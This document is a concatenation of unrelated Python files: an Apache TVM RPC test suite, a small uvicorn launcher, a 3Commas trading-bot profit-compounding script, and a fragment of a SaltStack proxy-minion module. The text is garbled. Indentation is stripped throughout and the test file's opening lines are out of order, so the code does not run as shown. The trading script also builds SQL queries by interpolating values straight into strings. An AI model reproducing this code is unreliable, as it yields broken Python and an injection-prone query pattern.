from tvm import rpc
from tvm.contrib import utils, cc
from tvm.rpc.tracker import Tracker
if __name__ == "__main__":
# NOTE: must live here to avoid registering PackedFunc with libtvm.so twice.
sys.exit(pytest.main([__file__] + sys.argv[1:]))
# tkonolige: The issue as I understand it is this: multiprocessing's spawn
# method launches a new process and then imports the relevant modules. This
# means that all registered functions must exist at the top level scope. In
# this file they are, so all is well when we run this file directly.
# However, when run under pytest, the functions aren't registered on the
# server. I believe this is because pytest is also using multiprocessing to
# run individual functions. Somewhere along the way, the imports are being
# lost, so the server ends up not registering the functions.
pytestmark = pytest.mark.skipif(
# Windows does not support fork so we can enable Windows for testing
sys.platform.startswith("win") == False and multiprocessing.get_start_method() != "fork",
reason=(
"pytest + multiprocessing spawn method causes tvm.register_func to "
"not work on the rpc.Server."
),
)
@tvm.testing.requires_rpc
def test_bigendian_rpc():
"""Test big endian rpc when there is a PowerPC RPC server available"""
host = os.environ.get("TVM_POWERPC_TEST_HOST", None)
port = os.environ.get("TVM_POWERPC_TEST_PORT", 9090)
if host is None:
return
def verify_rpc(remote, target, shape, dtype):
A = te.placeholder(shape, dtype=dtype)
B = te.compute(A.shape, lambda i: A[i] + tvm.tir.const(1, A.dtype))
s = te.create_schedule(B.op)
f = tvm.build(s, [A, B], target, name="myadd")
dev = remote.cpu(0)
a = tvm.nd.array(np.random.randint(0, 256, size=shape).astype(A.dtype), device=dev)
b = tvm.nd.array(np.zeros(shape).astype(A.dtype), device=dev)
temp = utils.tempdir()
path_dso = temp.relpath("dev_lib.o")
f.save(path_dso)
remote.upload(path_dso)
f = remote.load_module("dev_lib.o")
f(a, b)
tvm.testing.assert_allclose(a.asnumpy() + 1, b.asnumpy())
print("Test RPC connection to PowerPC...")
remote = rpc.connect(host, port)
target = "llvm -mtriple=powerpc-linux-gnu"
for dtype in ["float32", "float64", "int32", "int8"]:
verify_rpc(remote, target, (10,), dtype)
@tvm.testing.requires_rpc
def test_rpc_simple():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
f1 = client.get_function("rpc.test.addone")
assert f1(10) == 11
f3 = client.get_function("rpc.test.except")
with pytest.raises(tvm._ffi.base.TVMError):
f3("abc")
f2 = client.get_function("rpc.test.strcat")
assert f2("abc", 11) == "abc:11"
@tvm.testing.requires_rpc
def test_rpc_runtime_string():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
func = client.get_function("rpc.test.runtime_str_concat")
x = tvm.runtime.container.String("abc")
y = tvm.runtime.container.String("def")
assert str(func(x, y)) == "abcdef"
@tvm.testing.requires_rpc
def test_rpc_array():
x = np.ones((3, 4))
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
r_cpu = tvm.nd.array(x, remote.cpu(0))
assert str(r_cpu.device).startswith("remote")
np.testing.assert_equal(r_cpu.asnumpy(), x)
fremote = remote.get_function("rpc.test.remote_array_func")
fremote(r_cpu)
@tvm.testing.requires_rpc
def test_rpc_large_array():
# testcase of large array creation
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
dev = remote.cpu(0)
a_np = np.ones((5041, 720)).astype("float32")
b_np = np.ones((720, 192)).astype("float32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
np.testing.assert_equal(a.asnumpy(), a_np)
np.testing.assert_equal(b.asnumpy(), b_np)
@tvm.testing.requires_rpc
def test_rpc_echo():
def check(remote):
fecho = remote.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
with pytest.raises(RuntimeError):
raise_err = remote.get_function("testing.test_raise_error_callback")("RuntimeError")
raise_err()
remote.cpu().sync()
with pytest.raises(AttributeError):
f3 = remote.system_lib()["notexist"]
temp = rpc.server._server_env([])
server = rpc.Server()
client = rpc.connect("127.0.0.1", server.port)
check(rpc.LocalSession())
check(client)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# Test minrpc server.
temp = utils.tempdir()
minrpc_exec = temp.relpath("minrpc")
tvm.rpc.with_minrpc(cc.create_executable)(minrpc_exec, [])
check(rpc.PopenSession(minrpc_exec))
# minrpc on the remote
server = rpc.Server()
client = rpc.connect(
"127.0.0.1",
server.port,
session_constructor_args=["rpc.PopenSession", open(minrpc_exec, "rb").read()],
)
check(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_file_exchange():
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
blob = bytearray(np.random.randint(0, 10, size=(10)))
remote.upload(blob, "dat.bin")
rev = remote.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
@tvm.testing.requires_llvm
def test_rpc_remote_module():
# graph
n = tvm.runtime.convert(102)
A = te.placeholder((n,), name="A")
B = te.compute(A.shape, lambda *i: A(*i) + 1.0, name="B")
s = te.create_schedule(B.op)
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1"],
)
def check_remote(remote):
temp = utils.tempdir()
dev = remote.cpu(0)
f = tvm.build(s, [A, B], "llvm", name="myadd")
path_dso = temp.relpath("dev_lib.so")
f.export_library(path_dso)
remote.upload(path_dso)
f1 = remote.load_module("dev_lib.so")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator(f1.entry_name, remote.cpu(0), number=10)
cost = time_f(a, b).mean
print("%g secs/op" % cost)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
# Download the file from the remote
path_tar = temp.relpath("dev_lib.tar")
f.export_library(path_tar)
remote.upload(path_tar)
local_download_path = temp.relpath("dev_lib.download.so")
with open(local_download_path, "wb") as fo:
fo.write(remote.download_linked_module("dev_lib.tar"))
fupdated = tvm.runtime.load_module(local_download_path)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), tvm.cpu(0))
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), tvm.cpu(0))
fupdated(a, b)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# export to minrpc
temp = utils.tempdir()
f = tvm.build(s, [A, B], "llvm --system-lib", name="myadd")
path_minrpc = temp.relpath("dev_lib.minrpc")
f.export_library(path_minrpc, rpc.with_minrpc(cc.create_executable))
with pytest.raises(RuntimeError):
rpc.PopenSession("filenotexist")
# statrt the minrpc session.
remote = tvm.rpc.PopenSession(path_minrpc)
dev = remote.cpu(0)
f1 = remote.system_lib()
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator("myadd", remote.cpu(0), number=1)
cost = time_f(a, b).mean
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
# change to not executable
os.chmod(path_minrpc, stat.S_IRUSR)
with pytest.raises(RuntimeError):
rpc.PopenSession(path_minrpc)
def check_remote_link_cl(remote):
"""Test function to run remote code such as cl
This is not enabled because there is forking issue
of TVM runtime when server launches after OpenCL
runtime initializes. We leave it as an example
on how to do rpc when we want to do linking on remote.
"""
if not tvm.testing.device_enabled("opencl"):
print("Skip because opencl is not enabled")
return
temp = utils.tempdir()
dev = remote.cl(0)
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=32)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
f = tvm.build(s, [A, B], "opencl --host=llvm", name="myadd")
# Option 1: save modules separately and rely on remote compiler
path_o = temp.relpath("myadd.o")
path_cl = temp.relpath("myadd.cl")
path_json = temp.relpath("myadd.tvm_meta.json")
f.save(path_o)
f.imported_modules[0].save(path_cl)
remote.upload(path_o)
remote.upload(path_cl)
# upload meta data
remote.upload(path_json)
fhost = remote.load_module("myadd.o")
fdev = remote.load_module("myadd.cl")
fhost.import_module(fdev)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
# Option 2: export library as a tar ball then handled by remote compiler
path_tar = temp.relpath("myadd.tar")
f.export_library(path_tar)
remote.upload(path_tar)
fhost = remote.load_module("myadd.tar")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
check_remote(rpc.LocalSession())
check_remote(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_return_func():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
@tvm.testing.requires_rpc
def test_rpc_session_constructor_args():
# start server
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
def check_multi_hop():
# use server0 as proxy to connect to server1
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1"],
)
fecho = client.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
nd = tvm.nd.array([1, 2, 3], device=client.cpu(0))
assert nd.asnumpy()[1] == 2
def check_error_handling():
with pytest.raises(tvm.error.RPCError):
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.NonExistingConstructor"],
)
check_multi_hop()
check_error_handling()
@tvm.testing.requires_rpc
def test_rpc_return_ndarray():
# start server
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
m = client.get_function("rpc.test.remote_return_nd")
get_arr = m("get_arr")
ref_count = m("ref_count")
get_elem = m("get_elem")
get_arr_elem = m("get_arr_elem")
# array test
def run_arr_test():
arr = get_arr()
assert get_elem(0) == 0.0
assert get_arr_elem(arr, 0) == 0.0
run_arr_test()
@tvm.testing.requires_rpc
def test_local_func():
client = rpc.LocalSession()
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
blob = bytearray(np.random.randint(0, 10, size=(10)))
client.upload(blob, "dat.bin")
rev = client.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
def test_rpc_tracker_register():
# test registration
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
time.sleep(1)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
remote = client.request(device_key)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
del remote
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
server.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
tracker.terminate()
def _target(host, port, device_key, timeout):
client = rpc.connect_tracker(host, port)
remote = client.request(device_key, session_timeout=timeout)
while True:
pass
remote.cpu()
@tvm.testing.requires_rpc
def test_rpc_tracker_request():
# test concurrent request
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
proc1 = multiprocessing.Process(target=_target, args=("127.0.0.1", tracker.port, device_key, 4))
proc2 = multiprocessing.Process(
target=_target, args=("127.0.0.1", tracker.port, device_key, 200)
)
proc1.start()
time.sleep(0.5)
proc2.start()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 1
proc1.terminate()
proc1.join()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 0
proc2.terminate()
proc2.join()
server.terminate()
tracker.terminate()
|
main.py
|
from threading import Thread
from uvicorn import run
from web.app import app
from view.App import App
from ws.ws import Client
t = Thread(target=run, args=(app,), kwargs={
"port": 3000
}).start()
App().run()
# Client(lambda x: print(f"Token: {x}")).run_sync()
|
compound.py
|
#!/usr/bin/env python3
"""Cyberjunky's 3Commas bot helpers."""
import argparse
import configparser
import json
import logging
import os
import queue
import sqlite3
import sys
import threading
import time
from logging.handlers import TimedRotatingFileHandler as _TimedRotatingFileHandler
from pathlib import Path
import apprise
from py3cw.request import Py3CW
class NotificationHandler:
"""Notification class."""
def __init__(self, enabled=False, notify_urls=None):
if enabled and notify_urls:
self.apobj = apprise.Apprise()
urls = json.loads(notify_urls)
for url in urls:
self.apobj.add(url)
self.queue = queue.Queue()
self.start_worker()
self.enabled = True
else:
self.enabled = False
def start_worker(self):
"""Start notification worker."""
threading.Thread(target=self.process_queue, daemon=True).start()
def process_queue(self):
"""Process the queue."""
while True:
message, attachments = self.queue.get()
if attachments:
self.apobj.notify(body=message, attach=attachments)
else:
self.apobj.notify(body=message)
self.queue.task_done()
def send_notification(self, message, attachments=None):
"""Send a notification if enabled."""
if self.enabled:
msg = f"[3Commas bots helper {program}]\n" + message
self.queue.put((msg, attachments or []))
class TimedRotatingFileHandler(_TimedRotatingFileHandler):
"""Override original code to fix bug with not deleting old logfiles."""
def __init__(self, filename="", when="midnight", interval=1, backupCount=7):
super().__init__(
filename=filename,
when=when,
interval=int(interval),
backupCount=int(backupCount),
)
def getFilesToDelete(self):
"""Find all logfiles present."""
dirname, basename = os.path.split(self.baseFilename)
filenames = os.listdir(dirname)
result = []
prefix = basename + "."
plen = len(prefix)
for filename in filenames:
if filename[:plen] == prefix:
suffix = filename[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirname, filename))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[: len(result) - self.backupCount]
return result
def doRollover(self):
"""Delete old logfiles but keep latest backupCount amount."""
super().doRollover()
self.close()
timetuple = time.localtime(time.time())
dfn = self.baseFilename + "." + time.strftime(self.suffix, timetuple)
if os.path.exists(dfn):
os.remove(dfn)
os.rename(self.baseFilename, dfn)
if self.backupCount > 0:
for oldlog in self.getFilesToDelete():
os.remove(oldlog)
self.stream = open(self.baseFilename, "w")
currenttime = int(time.time())
newrolloverat = self.computeRollover(currenttime)
while newrolloverat <= currenttime:
newrolloverat = newrolloverat + self.interval
self.rolloverAt = newrolloverat
class Logger:
"""Logger class."""
my_logger = None
def __init__(self, notificationhandler, logstokeep, debug_enabled, notify_enabled):
"""Logger init."""
self.my_logger = logging.getLogger()
self.notify_enabled = notify_enabled
self.notificationhandler = notificationhandler
if debug_enabled:
self.my_logger.setLevel(logging.DEBUG)
self.my_logger.propagate = False
else:
self.my_logger.setLevel(logging.INFO)
self.my_logger.propagate = False
date_fmt = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(
"%(asctime)s - %(filename)s - %(levelname)s - %(message)s", date_fmt
)
console_formatter = logging.Formatter(
"%(asctime)s - %(filename)s - %(message)s", date_fmt
)
# Create directory if not exists
if not os.path.exists(f"{datadir}/logs"):
os.makedirs(f"{datadir}/logs")
# Log to file and rotate if needed
file_handle = TimedRotatingFileHandler(
filename=f"{datadir}/logs/{program}.log", backupCount=logstokeep
)
# file_handle.setLevel(logging.DEBUG)
file_handle.setFormatter(formatter)
self.my_logger.addHandler(file_handle)
# Log to console
console_handle = logging.StreamHandler()
console_handle.setLevel(logging.INFO)
console_handle.setFormatter(console_formatter)
self.my_logger.addHandler(console_handle)
def log(self, message, level="info"):
"""Call the log levels."""
if level == "info":
self.my_logger.info(message)
elif level == "warning":
self.my_logger.warning(message)
elif level == "error":
self.my_logger.error(message)
elif level == "debug":
self.my_logger.debug(message)
def info(self, message, notify=False):
"""Info level."""
self.log(message, "info")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def warning(self, message, notify=True):
"""Warning level."""
self.log(message, "warning")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def error(self, message, notify=True):
"""Error level."""
self.log(message, "error")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def debug(self, message, notify=False):
"""Debug level."""
self.log(message, "debug")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def load_config():
"""Create default or load existing config file."""
cfg = configparser.ConfigParser()
if cfg.read(f"{datadir}/{program}.ini"):
return cfg
cfg["settings"] = {
"timezone": "Europe/Amsterdam",
"timeinterval": 3600,
"debug": False,
"logrotate": 7,
"botids": [12345, 67890],
"profittocompound": 1.0,
"3c-apikey": "Your 3Commas API Key",
"3c-apisecret": "Your 3Commas API Secret",
"notifications": False,
"notify-urls": ["notify-url1", "notify-url2"],
}
with open(f"{datadir}/{program}.ini", "w") as cfgfile:
cfg.write(cfgfile)
return None
def init_threecommas_api(cfg):
"""Init the 3commas API."""
return Py3CW(
key=cfg.get("settings", "3c-apikey"),
secret=cfg.get("settings", "3c-apisecret"),
request_options={
"request_timeout": 10,
"nr_of_retries": 3,
"retry_status_codes": [502],
},
)
def get_threecommas_deals(botid):
"""Get all deals from 3Commas from a bot."""
error, data = api.request(
entity="deals",
action="",
payload={
"scope": "finished",
"bot_id": str(botid),
"limit": 100,
},
)
if error:
logger.error("Fetching deals failed with error: %s" % error)
else:
logger.info("Fetched the deals for this bot OK (%s deals)" % len(data))
return data
def check_deal(dealid):
"""Check if deal was already logged."""
data = cursor.execute(f"SELECT * FROM deals WHERE dealid = {dealid}").fetchone()
if data is None:
return False
return True
def update_bot(
thebot, new_base_order_volume, new_safety_order_volume, profit_sum, deals_count
):
"""Update bot with new order volumes."""
bot_name = thebot["name"]
base_order_volume = float(thebot["base_order_volume"])
safety_order_volume = float(thebot["safety_order_volume"])
logger.info(
"Calculated BO volume changed from: %s to %s"
% (base_order_volume, new_base_order_volume)
)
logger.info(
"Calculated SO volume changed from: %s to %s"
% (safety_order_volume, new_safety_order_volume)
)
error, data = api.request(
entity="bots",
action="update",
action_id=str(thebot["id"]),
payload={
"bot_id": thebot["id"],
"name": thebot["name"],
"pairs": thebot["pairs"],
"base_order_volume": new_base_order_volume, # new base order volume
"safety_order_volume": new_safety_order_volume, # new safety order volume
"take_profit": thebot["take_profit"],
"martingale_volume_coefficient": thebot["martingale_volume_coefficient"],
"martingale_step_coefficient": thebot["martingale_step_coefficient"],
"max_active_deals": thebot["max_active_deals"],
"max_safety_orders": thebot["max_safety_orders"],
"safety_order_step_percentage": thebot["safety_order_step_percentage"],
"take_profit_type": thebot["take_profit_type"],
"strategy_list": thebot["strategy_list"],
"active_safety_orders_count": thebot["active_safety_orders_count"],
},
)
if data:
base = thebot["pairs"][0].split("_")[0]
if base == "BTC":
logger.info(
f"Compounded ₿{round(profit_sum, 8)} in profit from {deals_count} deal(s) "
f"made by '{bot_name}'\nChanged BO from ₿{round(base_order_volume, 8)} to "
f"₿{round(new_base_order_volume, 8)}\nChanged SO from "
f"₿{round(safety_order_volume, 8)} to ₿{round(new_safety_order_volume, 8)}",
True,
)
else:
logger.info(
f"Compounded ${round(profit_sum, 4)} in profit from {deals_count} deal(s) "
f"made by '{bot_name}'\nChanged BO from ${round(base_order_volume, 4)} to "
f"${round(new_base_order_volume, 4)}\nChanged SO from "
f"${round(safety_order_volume, 4)} to ${round(new_safety_order_volume, 4)}",
True,
)
else:
logger.error(
"Error occurred updating bot with new BO/SO values: %s" % error["msg"]
)
def process_deals(deals):
"""Check deals from bot."""
deals_count = 0
profit_sum = 0.0
for deal in deals:
deal_id = deal["id"]
# Register deal in database
exist = check_deal(deal_id)
if exist:
logger.debug("Deal with id '%s' already processed, skipping." % deal_id)
else:
# Deal not processed yet
profit = float(deal["final_profit"])
deals_count += 1
profit_sum += profit
db.execute(
f"INSERT INTO deals (dealid, profit) VALUES ({deal_id}, {profit})"
)
logger.info("Finished deals: %s total profit: %s" % (deals_count, profit_sum))
db.commit()
# Calculate profit part to compound
logger.info("Profit available to compound: %s" % profit_sum)
profit_sum *= profit_percentage
logger.info(
"Profit available after applying percentage value (%s): %s "
% (profit_percentage, profit_sum)
)
return (deals_count, profit_sum)
def compound_bot(thebot):
"""Find profit from deals and calculate new SO and BO values."""
bot_name = thebot["name"]
deals = get_threecommas_deals(thebot["id"])
if deals:
deals_count, profit_sum = process_deals(deals)
if profit_sum:
# Bot values to calculate with
base_order_volume = float(thebot["base_order_volume"])
safety_order_volume = float(thebot["safety_order_volume"])
max_active_deals = thebot["max_active_deals"]
max_safety_orders = thebot["max_safety_orders"]
martingale_volume_coefficient = float(
thebot["martingale_volume_coefficient"]
)
funds_so_needed = safety_order_volume
total_so_funds = safety_order_volume
if max_safety_orders > 1:
for i in range(1, max_safety_orders):
funds_so_needed *= float(martingale_volume_coefficient)
total_so_funds += funds_so_needed
logger.info("Current bot settings :")
logger.info("Base order volume : %s" % base_order_volume)
logger.info("Safety order volume : %s" % safety_order_volume)
logger.info("Max active deals : %s" % max_active_deals)
logger.info("Max safety orders : %s" % max_safety_orders)
logger.info("SO volume scale : %s" % martingale_volume_coefficient)
# Calculate the BO/SO ratio
bo_percentage = (
100
* float(base_order_volume)
/ (float(base_order_volume) + float(total_so_funds))
)
so_percentage = (
100
* float(total_so_funds)
/ (float(total_so_funds) + float(base_order_volume))
)
logger.info("BO percentage: %s" % bo_percentage)
logger.info("SO percentage: %s" % so_percentage)
# Calculate compound values
bo_profit = ((profit_sum * bo_percentage) / 100) / max_active_deals
so_profit = bo_profit * (safety_order_volume / base_order_volume)
logger.info("BO compound value: %s" % bo_profit)
logger.info("SO compound value: %s" % so_profit)
# Update the bot
update_bot(
thebot,
(base_order_volume + bo_profit),
(safety_order_volume + so_profit),
profit_sum,
deals_count,
)
else:
logger.info(
f"{bot_name}\nNo (new) profit made, no BO/SO value updates needed!",
True,
)
else:
logger.info(f"{bot_name}\nNo (new) deals found for this bot!", True)
def init_compound_db():
"""Create or open database to store bot and deals data."""
try:
dbname = f"{program}.sqlite3"
dbpath = f"file:{datadir}/{dbname}?mode=rw"
dbconnection = sqlite3.connect(dbpath, uri=True)
logger.info(f"Database '{datadir}/{dbname}' opened successfully")
except sqlite3.OperationalError:
dbconnection = sqlite3.connect(f"{datadir}/{dbname}")
dbcursor = dbconnection.cursor()
logger.info(f"Database '{datadir}/{dbname}' created successfully")
dbcursor.execute("CREATE TABLE deals (dealid INT Primary Key, profit REAL)")
logger.info("Database tables created successfully")
return dbconnection
def upgrade_compound_db():
"""Upgrade database if needed."""
try:
cursor.execute("ALTER TABLE deals ADD COLUMN profit REAL")
logger.info("Database schema upgraded")
except sqlite3.OperationalError:
logger.debug("Database schema is up-to-date")
# Start application
program = Path(__file__).stem
# Parse and interpret options.
parser = argparse.ArgumentParser(description="Cyberjunky's 3Commas bot helper.")
parser.add_argument("-d", "--datadir", help="data directory to use", type=str)
args = parser.parse_args()
if args.datadir:
datadir = args.datadir
else:
datadir = os.getcwd()
# Create or load configuration file
config = load_config()
if not config:
logger = Logger(None, 7, False, False)
logger.info(f"3Commas bot helper {program}!")
logger.info("Started at %s." % time.strftime("%A %H:%M:%S %d-%m-%Y"))
logger.info(
f"Created example config file '{datadir}/{program}.ini', edit it and restart the program."
)
sys.exit(0)
else:
# Handle timezone
if hasattr(time, "tzset"):
os.environ["TZ"] = config.get(
"settings", "timezone", fallback="Europe/Amsterdam"
)
time.tzset()
# Init notification handler
notification = NotificationHandler(
config.getboolean("settings", "notifications"),
config.get("settings", "notify-urls"),
)
# Init logging
logger = Logger(
notification,
int(config.get("settings", "logrotate", fallback=7)),
config.getboolean("settings", "debug"),
config.getboolean("settings", "notifications"),
)
logger.info(f"3Commas bot helper {program}")
logger.info("Started at %s" % time.strftime("%A %H:%M:%S %d-%m-%Y"))
logger.info(f"Loaded configuration from '{datadir}/{program}.ini'")
if notification.enabled:
logger.info("Notifications are enabled")
else:
logger.info("Notifications are disabled")
# Initialize 3Commas API
api = init_threecommas_api(config)
# Initialize or open database
db = init_compound_db()
cursor = db.cursor()
# Upgrade database if needed
upgrade_compound_db()
if "compound" in program:
# Auto compound profit by tweaking SO/BO
while True:
config = load_config()
logger.info(f"Reloaded configuration from '{datadir}/{program}.ini'")
# User settings
botids = json.loads(config.get("settings", "botids"))
timeint = int(config.get("settings", "timeinterval"))
profit_percentage = float(
config.get("settings", "profittocompound", fallback=1.0)
)
# Walk through all bots specified
for bot in botids:
boterror, botdata = api.request(
entity="bots",
action="show",
action_id=str(bot),
)
if botdata:
compound_bot(botdata)
else:
logger.error("Error occurred compounding bots: %s" % boterror["msg"])
if timeint > 0:
localtime = time.time()
nexttime = localtime + int(timeint)
timeresult = time.strftime("%H:%M:%S", time.localtime(nexttime))
logger.info("Next update in %s Seconds at %s" % (timeint, timeresult), True)
time.sleep(timeint)
else:
break
|
proxy.py
|
# -*- coding: utf-8 -*-
#
# Proxy minion metaproxy modules
#
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import os
import signal
import sys
import types
import logging
import threading
import traceback
# Import Salt Libs
# pylint: disable=3rd-party-module-not-gated
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.serializers.msgpack
import salt.minion
import salt.defaults.exitcodes
import salt.utils.dictupdate
from salt.utils.event import tagify
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltSystemExit,
)
from salt.ext import six
from salt.ext.six.moves import range
from salt.minion import ProxyMinion
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
def post_master_init(self, master):
log.debug("subclassed LazyLoaded _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id ' + self.opts['id'] + '. ' + \
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
if self.opts.get('proxy_merge_pillar_in_opts'):
# Override proxy opts with pillar data when the user required.
self.opts = salt.utils.dictupdate.merge(self.opts,
self.opts['pillar'],
strategy=self.opts.get('proxy_merge_pillar_in_opts_strategy'),
merge_lists=self.opts.get('proxy_deep_merge_pillar_in_opts', False))
elif self.opts.get('proxy_mines_pillar'):
# Even when not required, some details such as mine configuration
# should be merged anyway whenever possible.
if 'mine_interval' in self.opts['pillar']:
self.opts['mine_interval'] = self.opts['pillar']['mine_interval']
if 'mine_functions' in self.opts['pillar']:
general_proxy_mines = self.opts.get('mine_functions', [])
specific_proxy_mines = self.opts['pillar']['mine_functions']
try:
self.opts['mine_functions'] = general_proxy_mines + specific_proxy_mines
except TypeError as terr:
log.error('Unable to merge mine functions from the pillar in the opts, for proxy {}'.format(
self.opts['id']))
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
# Pull in the utils
self.utils = salt.loader.utils(self.opts)
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts, utils=self.utils)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
